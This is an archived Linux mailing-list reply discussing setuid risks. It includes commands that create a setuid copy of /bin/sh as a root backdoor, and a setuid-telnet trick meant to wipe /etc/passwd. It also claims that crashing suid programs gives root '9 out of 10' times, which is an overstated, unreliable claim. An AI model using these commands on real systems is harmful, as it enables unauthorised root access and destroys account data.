[Subject Prev][Subject Next][Thread Prev][Thread Next][Subject Index][Thread Index]

Re: Hi all,



sudheer@xxxxxxxxxxxxx wrote:


> >
> > root>cp /bin/sh /bin/mysh
> > root>chmod +s /bin/mysh
> > root>chmod +x /bin/mysh 'may not be required.
> >
> > That's all, now go away and login as any user from any where in the
> > world,
> >
> > anyuser>whoami
> > anyuser
> > anyuser>/bin/mysh
> > anyuser>whoami
> > root
> 
>     This won't work. the shells are more intelligent nowadays.
>   they behave according to the uid of the process invoking the shell.
>   just like that of a 'passwd' program. eventhough the setuid bit is
>   set for the 'passwd' program, a normal user can't change the passwd of
>   another user even if he knows the other person's passwd.
> 
>   please, correct me if am wrong.
> 
> sudheer

Yes it works on my rh 5.2 box, and that is the way i get root on my
linux box.

You can not change password of another user, because passwd checks for
the uid/gid. 

Suid programs are extremely dangerous for the server security. If a user
can make any suid  exit with a segmentation fault, in he becomes root in
9 out of 10 cases.

Want to try power of suid ? But back up  /etc/passwd else you will
regret ?

root>chmod +s /bin/telnet

now be any user and

WARNING - make a copy copy of /etc/passwd file before you proceed.

anyuser> telnet -n /etc/passwd nosuchhost.nosuchdomain

Your /etc/passwd file will be wiped out.

Best Wishes.

- -mukund

http://members.theglobe.com/betacomp/default.html
http://members.xoom.com/BETACOMP/index1.htm


- --------------------------------------------------------------------
For more information on Linux in India visit http://www.linux-india.org/
Linux India is NOT a forum for Microsoft/India/Pakistan/US/UK bashing.
Flame baits will not be tolerated.  If you can appreciate satire read
http://www.templetons.com/brad/emily.html

------------------------------